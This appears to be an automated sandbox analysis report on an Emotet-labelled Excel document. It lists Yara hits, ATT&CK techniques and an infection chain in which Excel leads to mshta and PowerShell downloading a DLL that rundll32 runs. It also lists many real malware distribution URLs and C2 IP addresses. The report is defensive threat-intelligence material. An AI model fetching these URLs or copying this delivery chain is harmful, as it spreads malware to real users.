                            Source: Yara matchFile source: 15.2.rundll32.exe.2d00000.19.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.20f0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.7f0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2660000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.bd0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f10000.23.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.820000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2c80000.18.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2400000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2e00000.21.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2fa0000.26.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3050000.28.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ec0000.11.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2400000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2740000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ba0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e60000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2d30000.20.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.430000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2860000.17.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.28a0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2f10000.23.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2700000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.ac0000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3020000.27.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2f60000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27d0000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.3100000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2c0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.2780000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2800000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.3030000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.460000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672072251.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541554027.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672636811.0000000000430000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578707809.0000000002821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542046828.0000000002820000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541660738.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672779840.0000000000461000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673803269.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542478575.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541724844.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542228436.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674180199.0000000002E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541516961.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674124482.0000000002E00000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541940450.0000000002741000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578772331.00000000028A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672599547.0000000000401000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578889173.0000000002EB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673644143.0000000002630000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674231548.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.579012623.0000000003101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578238624.00000000003B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542432486.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673769200.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672141355.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578430206.0000000002431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542188675.0000000002E61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578354929.00000000020F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542349142.0000000002F61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673878753.0000000002861000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673392642.0000000000BA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674347408.0000000002FA1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544093130.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673698904.0000000002661000.00000020.00000010.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578582490.0000000002781000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673289454.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580707170.00000000001F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541608095.0000000000280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544152494.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541890184.0000000002420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674038716.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578396219.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672197445.0000000000340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673986023.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674276133.0000000002F41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578626401.00000000027B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.494656303.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542388778.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578293718.0000000000620000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673600434.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674675365.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542302044.0000000002EF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.672985189.00000000004A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674444263.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578111273.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578532434.0000000002700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674481357.0000000003081000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.541702376.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673330806.0000000000AC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674312422.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674404496.0000000003020000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.674070435.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.542264283.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673440087.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.544337274.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580607139.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.673835028.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.581940657.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.579044435.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000D.00000002.578950230.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\JooSee.dll, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		1
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium13
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts111
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Email Collection                            		Exfiltration Over Bluetooth1
                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)21
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration2
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS21
                            Security Software Discovery                            		Distributed Component Object Model1
                            Clipboard Data                            		Scheduled Transfer122
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script2
                            Masquerading                            		LSA Secrets1
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials1
                            Process Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items111
                            Process Injection                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories                            		Proc Filesystem1
                            Remote System Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Rundll32                            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562403 Sample: imedpub_6.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 42 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 16 other signatures 2->69 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\imedpub_6.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.172, 49167, 49168, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 hostfeeling.com 164.90.147.135, 80 DIGITALOCEAN-ASNUS United States 23->57 59 jurnalpjf.lan.go.id 103.206.244.105, 49170, 80 CEPATNET-AS-IDPTMoraTelematikaIndonesiaID Indonesia 23->59 45 C:\ProgramData\JooSee.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\...\xjvfkwqtmalp.bjg (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            imedpub_6.xls19%ReversingLabsDocument-Excel.Trojan.Emotet

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\JooSee.dll100%Joe Sandbox ML

                            Unpacked PE Files

                            SourceDetectionScannerLabelLinkDownload
                            15.2.rundll32.exe.340000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2430000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2820000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2420000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.620000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.3b0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2ef0000.12.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.1c0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2820000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2ec0000.11.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.190000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.27b0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2d30000.20.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2c80000.18.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.ac0000.8.unpack100%AviraHEUR/AGEN.1145233Download File
                            9.2.rundll32.exe.330000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.bd0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2f40000.24.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2f60000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2f70000.25.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2700000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.4a0000.6.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.1f0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2830000.16.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2fc0000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2e80000.22.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.280000.2.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2d00000.19.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.25b0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2630000.12.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.3080000.29.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.7f0000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            14.2.rundll32.exe.180000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.200000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.20f0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            11.2.rundll32.exe.350000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2660000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.270000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2e00000.21.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.2400000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.820000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2eb0000.11.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2fa0000.26.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.3050000.28.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2e90000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            10.2.rundll32.exe.2f60000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2740000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.2860000.17.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.ba0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2e60000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.430000.4.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.28a0000.10.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2f10000.23.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.3020000.27.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.27d0000.14.unpack100%AviraHEUR/AGEN.1145233Download File
                            13.2.rundll32.exe.3100000.13.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.610000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.1c0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            11.2.rundll32.exe.1e0000.0.unpack100%AviraHEUR/AGEN.1145233Download File
                            15.2.rundll32.exe.2800000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            13.2.rundll32.exe.2780000.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.2c0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            15.2.rundll32.exe.460000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                            10.2.rundll32.exe.3030000.15.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                            Domains

                            SourceDetectionScannerLabelLink
                            hostfeeling.com11%VirustotalBrowse
                            jurnalpjf.lan.go.id1%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://maxtdeveloper.com/okw9yx/100%Avira URL Cloudmalware
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/100%Avira URL Cloudmalware
                            http://it-o.biz/bitrix/xoDdDe/PE3100%Avira URL Cloudmalware
                            http://www.inablr.com/elenctic/f100%Avira URL Cloudmalware
                            http://totalplaytuxtla.com/sitio/DgktL3zd/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.html:0%Avira URL Cloudsafe
                            http://ocsp.entrust.net030%URL Reputationsafe
                            http://hostfeeling.com/wp-admin/100%Avira URL Cloudmalware
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3100%Avira URL Cloudmalware
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                            https://property-eg.com/mlzkir/97v/100%Avira URL Cloudmalware
                            http://91.240.110%URL Reputationsafe
                            http://91.240.118.172/gg/ff/fe.png100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.pngPE30%Avira URL Cloudsafe
                            http://jurnalpjf.lan.go.id/asset0%Avira URL Cloudsafe
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3100%Avira URL Cloudmalware
                            http://bimesarayenovin.ir/wp-adm100%Avira URL Cloudmalware
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/100%Avira URL Cloudmalware
                            https://160.16.102.168:80/SoFzpWBFIEFVoCFQgg0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.html0%Avira URL Cloudsafe
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.html~0%Avira URL Cloudsafe
                            http://ocsp.entrust.net0D0%URL Reputationsafe
                            http://hostfeeling.com100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com100%Avira URL Cloudmalware
                            http://it-o.biz/0%Avira URL Cloudsafe
                            http://jurnalpjf.lan.go.id/assets/iM/100%Avira URL Cloudmalware
                            http://activetraining.sytes.net/100%Avira URL Cloudmalware
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp-content/GG01c/PE3100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp0%Avira URL Cloudsafe
                            http://daisy.suk0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlngs0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlmshta0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlWinSta00%Avira URL Cloudsafe
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3100%Avira URL Cloudmalware
                            https://property-eg.com/mlzkir/97v/PE3100%Avira URL Cloudmalware
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/100%Avira URL Cloudmalware
                            https://property-eg.com/mlzkir/9100%Avira URL Cloudmalware
                            http://91.240.118.1720%Avira URL Cloudsafe
                            https://160.16.102.168/0%Avira URL Cloudsafe
                            http://jurnalpjf.lan.go.id0%Avira URL Cloudsafe
                            http://www.protware.com0%URL Reputationsafe
                            http://activetraining.sytes.net/libraries/8s/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlfunction0%Avira URL Cloudsafe
                            http://totalplaytuxtla.com/sitio0%Avira URL Cloudsafe
